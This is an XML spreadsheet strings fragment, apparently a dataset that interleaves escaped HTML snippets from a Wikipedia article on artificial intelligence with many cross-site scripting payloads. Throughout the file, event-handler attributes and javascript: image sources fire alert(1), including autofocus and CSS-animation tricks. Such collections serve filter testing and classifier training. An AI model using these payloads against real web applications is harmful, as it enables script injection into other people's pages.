    <t>&lt;canvas draggable="true" ondragstart="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup draggable="true" ondragstart="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-339"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-339"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div id="simpleSearch"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Phenomenalism" title="Phenomenalism"&gt;Phenomenalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;samp onclick="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;data id=x tabindex=1 onfocus=alert(1)&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;article onclick="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Zairja" title="Zairja"&gt;Zairja &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Wilhelm_Windelband" title="Wilhelm Windelband"&gt;Wilhelm Windelband &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="See_also"&gt;See also </t>
  </si>
  <si>
    <t>&lt;datalist onmouseup="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;select onpointerover=alert(1)&gt;XSS&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Are intelligent machines dangerous? How can we ensure that machines behave ethically and that they are used ethically? &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;datalist id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;dt id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;data onmouseover="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFKurzweil2005"&gt;Kurzweil 2005 &lt;/a&gt;, p.&amp;#160;265 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;marquee onload=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;ins onmouseenter="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;center onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/center&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;body onmouseenter="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onpointerout=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;time style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Uninformed_search-188"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Uninformed_search_188-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;noscript oncopy="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;progress draggable="true" ondragstart="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;s id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/s&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;dt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Enterprise_software" title="Enterprise software"&gt;Enterprise software &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Dreyfus%27_critique_of_artificial_intelligence" class="mw-redirect" title="Dreyfus&amp;#39; critique of artificial intelligence"&gt;Dreyfus' critique of artificial intelligence &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientific_method" title="Scientific method"&gt;Scientific method &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;51–107 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ruby oncut="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;samp onkeyup="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;header draggable="true" ondragstart="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;xmp id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/xmp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;form onmousemove="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;rb onmouseout="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;script oncut="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;p id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Artificial_life" title="Artificial life"&gt;Artificial life &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:362px;"&gt;&lt;a href="/wiki/File:EM_Clustering_of_Old_Faithful_data.gif" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/6/69/EM_Clustering_of_Old_Faithful_data.gif" decoding="async" width="360" height="309" class="thumbimage" data-file-width="360" data-file-height="309" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;&lt;a href="/wiki/Expectation-maximization" class="mw-redirect" title="Expectation-maximization"&gt;Expectation-maximization &lt;/a&gt; clustering of &lt;a href="/wiki/Old_Faithful" title="Old Faithful"&gt;Old Faithful &lt;/a&gt; eruption data starts from a random guess but then successfully converges on an accurate clustering of the two physically distinct modes of eruption. &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;p id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/p&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHenderson2007" class="citation news"&gt;Henderson, Mark (24 April 2007). &lt;a rel="nofollow" class="external text" href="http://www.thetimes.co.uk/tto/technology/article1966391.ece"&gt;"Human rights for robots? We're getting carried away" &lt;/a&gt;. &lt;i&gt;The Times Online &lt;/i&gt;. London. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Times+Online&amp;amp;rft.atitle=Human+rights+for+robots%3F+We%27re+getting+carried+away&amp;amp;rft.date=2007-04-24&amp;amp;rft.aulast=Henderson&amp;amp;rft.aufirst=Mark&amp;amp;rft_id=http%3A%2F%2Fwww.thetimes.co.uk%2Ftto%2Ftechnology%2Farticle1966391.ece&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;center onmouseout="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;139–179, 245–250, 322–323 (EPAM) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;track onclick="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onpaste="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;textarea draggable="true" ondragenter="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;Pennachin, C.; Goertzel, B. (2007). &lt;i&gt;Contemporary Approaches to Artificial General Intelligence &lt;/i&gt;. &lt;i&gt;Artificial General Intelligence. Cognitive Technologies &lt;/i&gt;. Cognitive Technologies. Berlin, Heidelberg: Springer. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2F978-3-540-68677-4_1"&gt;10.1007/978-3-540-68677-4_1 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-3-540-23733-4" title="Special:BookSources/978-3-540-23733-4"&gt;&lt;bdi&gt;978-3-540-23733-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Contemporary+Approaches+to+Artificial+General+Intelligence&amp;amp;rft.place=Berlin%2C+Heidelberg&amp;amp;rft.series=Cognitive+Technologies&amp;amp;rft.pub=Springer&amp;amp;rft.date=2007&amp;amp;rft_id=info%3Adoi%2F10.1007%2F978-3-540-68677-4_1&amp;amp;rft.isbn=978-3-540-23733-4&amp;amp;rft.aulast=Pennachin&amp;amp;rft.aufirst=C.&amp;amp;rft.au=Goertzel%2C+B.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Transhumanism" title="Transhumanism"&gt;Transhumanism &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;header onmousemove="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;dfn id=x tabindex=1 onfocus=alert(1)&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onpointerdown=alert(1)&gt;XSS&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;spacer style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onmouseenter="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;applet onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/applet&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;meter onbeforepaste="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;dfn draggable="true" ondrag="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;em onkeypress="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;button onkeyup="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onclick="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;select autofocus onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-12"&gt;&lt;a href="#Social_intelligence"&gt;&lt;span class="tocnumber"&gt;4.8 </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-49"&gt;&lt;a href="#The_limits_of_artificial_general_intelligence"&gt;&lt;span class="tocnumber"&gt;8.1 </t>
  </si>
  <si>
    <t>&lt;hgroup onmouseup="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;rt onpointerup=alert(1)&gt;XSS&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="news.html"&gt;&lt;span class="doc"&gt;Release notes</t>
  </si>
  <si>
    <t>&lt;p&gt;AI has developed many tools to solve the most difficult problems in &lt;a href="/wiki/Computer_science" title="Computer science"&gt;computer science &lt;/a&gt;. A few of the most general of these methods are discussed below.</t>
  </si>
  <si>
    <t>&lt;embed draggable="true" ondragend="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;body id=x tabindex=1 onactivate=alert(1)&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;label ondragover=alert(1) contenteditable&gt;drop here&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTERussellNorvig200318-34"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTERussellNorvig200318_34-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;frame onkeyup="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Schaeffer J. (2009) Didn't Samuel Solve That Game?. In: One Jump Ahead. Springer, Boston, MA </t>
  </si>
  <si>
    <t>&lt;th id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/th&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;noframes draggable="true" ondragleave="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;h1 oncopy="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;label id=x tabindex=1 onactivate=alert(1)&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_engineering" title="Glossary of engineering"&gt;Engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Artificial_intelligence_in_healthcare" title="Artificial intelligence in healthcare"&gt;Artificial intelligence in healthcare &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;noframes draggable="true" ondragend="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onpointerout=alert(1)&gt;XSS&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;area style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-grie2012-240"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-grie2012_240-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Senthilingam, Meera (12 May 2016). &lt;a rel="nofollow" class="external text" href="http://www.cnn.com/2016/05/12/health/robot-surgeon-bowel-operation/"&gt;"Are Autonomous Robots Your next Surgeons?" &lt;/a&gt;. &lt;i&gt;CNN &lt;/i&gt;. Cable News Network. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20161203154119/http://www.cnn.com/2016/05/12/health/robot-surgeon-bowel-operation"&gt;Archived &lt;/a&gt; from the original on 3 December 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;4 December </t>
  </si>
  <si>
    <t>&lt;meta draggable="true" ondragenter="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;bdi onload=alert(1)&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="read-more-container"&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onpointerover=alert(1)&gt;XSS&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;noembed draggable="true" ondrag="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;rp ondrop=alert(1) contenteditable&gt;drop here&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;u onmouseleave="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;spacer oncontextmenu="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;progress onmousedown="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;footer id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;area id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/area&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Positivism" title="Positivism"&gt;Positivism &lt;/a&gt;&amp;#160;/&amp;#32;&lt;a href="/wiki/Reductionism" title="Reductionism"&gt;Reductionism &lt;/a&gt;&amp;#160;/&amp;#32;&lt;a href="/wiki/Determinism" title="Determinism"&gt;Determinism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;a ondragover=alert(1) contenteditable&gt;drop here&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;em onmouseover="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;rb onpointerleave=alert(1)&gt;XSS&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;center id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/center&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;meta onbeforepaste="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_psychology" title="Philosophy of psychology"&gt;Psychology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;486–487 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;aside onbeforecut="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=JaVaScRiPt:alert('')&gt;</t>
  </si>
  <si>
    <t>&lt;area draggable="true" ondrag="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=`javascript:alert("RSnake says, ''")`&gt;</t>
  </si>
  <si>
    <t>&lt;textarea draggable="true" ondragend="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;applet onmouseleave="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;head ondragover=alert(1) contenteditable&gt;drop here&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_meteorology" title="Glossary of meteorology"&gt;Meteorology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFAsadaHosodaKuniyoshiIshiguro2009"&gt;Asada et al. 2009 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/feed-exports.html"&gt;&lt;span class="doc"&gt;Feed exports</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;audio ondragover=alert(1) contenteditable&gt;drop here&lt;/audio&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-45"&gt;&lt;a href="#Audit"&gt;&lt;span class="tocnumber"&gt;7.10 </t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;h3 id="p-variants-label"&gt;</t>
  </si>
  <si>
    <t>&lt;style onmouseover="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style onpointerout=alert(1)&gt;XSS&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;area draggable="true" ondragenter="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;var onclick="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Wendell Wallach (2010). &lt;i&gt;Moral Machines &lt;/i&gt;, Oxford University Press. </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;frame style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Petro_Grigorenko" title="Petro Grigorenko"&gt;Pyotr Grigorenko &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;td id=x tabindex=1 onactivate=alert(1)&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;hr onpointerup=alert(1)&gt;XSS&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;noscript oncontextmenu="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;title onbeforepaste="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;area onload=alert(1)&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onkeydown="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;table ondblclick="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Automated_reasoning" title="Automated reasoning"&gt;Automated reasoning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onpointerleave=alert(1)&gt;XSS&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onmouseup="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;mark onblur=alert(1) tabindex=1 id=x&gt;&lt;/mark&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;picture id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;span onpointerenter=alert(1)&gt;XSS&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;314–329, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1918) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;video ondragover=alert(1) contenteditable&gt;drop here&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;samp onkeypress="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onbeforepaste="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onblur=alert(1) tabindex=1 id=x&gt;&lt;/tbody&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onmousedown="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Machines with intelligence have the potential to use their intelligence to prevent harm and minimize the risks; they may have the ability to use &lt;a href="/wiki/Ethics" title="Ethics"&gt;ethical reasoning &lt;/a&gt; to better choose their actions in the world. As such, there is a need for policy making to devise policies for and regulate artificial intelligence and robotics.&lt;sup id="cite_ref-391" class="reference"&gt;&lt;a href="#cite_note-391"&gt;&amp;#91;380&amp;#93; &lt;/a&gt; &lt;/sup&gt; Research in this area includes &lt;a href="/wiki/Machine_ethics" title="Machine ethics"&gt;machine ethics &lt;/a&gt;, &lt;a href="/wiki/Artificial_moral_agents" class="mw-redirect" title="Artificial moral agents"&gt;artificial moral agents &lt;/a&gt;, &lt;a href="/wiki/Friendly_AI" class="mw-redirect" title="Friendly AI"&gt;friendly AI &lt;/a&gt; and discussion towards building a &lt;a href="/wiki/Human_rights" title="Human rights"&gt;human rights &lt;/a&gt; framework is also in talks.&lt;sup id="cite_ref-392" class="reference"&gt;&lt;a href="#cite_note-392"&gt;&amp;#91;381&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;del onload=alert(1)&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onkeydown="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;240–310, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;a style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;iframe draggable="true" ondrag="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;textarea draggable="true" ondragstart="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;p class="mw-empty-elt"&gt;</t>
  </si>
  <si>
    <t>&lt;sup onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/sup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Leading AI researcher &lt;a href="/wiki/Rodney_Brooks" title="Rodney Brooks"&gt;Rodney Brooks &lt;/a&gt; writes, "I think it is a mistake to be worrying about us developing malevolent AI anytime in the next few hundred years. I think the worry stems from a fundamental error in not distinguishing the difference between the very real recent advances in a particular aspect of AI, and the enormity and complexity of building sentient volitional intelligence."&lt;sup id="cite_ref-400" class="reference"&gt;&lt;a href="#cite_note-400"&gt;&amp;#91;389&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;track style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup draggable="true" ondragend="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onmouseleave="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;style onmouseout="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;tr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;center onpointerleave=alert(1)&gt;XSS&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;strong id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;tt onpointerout=alert(1)&gt;XSS&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;dir onblur=alert(1) tabindex=1 id=x&gt;&lt;/dir&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rp onmouseenter="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=11" title="Edit section: Motion and manipulation"&gt;edit &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;figure id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-64"&gt;&lt;a href="#Robot_rights"&gt;&lt;span class="tocnumber"&gt;8.4.4 </t>
  </si>
  <si>
    <t>&lt;plaintext id=x tabindex=1 onfocus=alert(1)&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;option onbeforecut="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
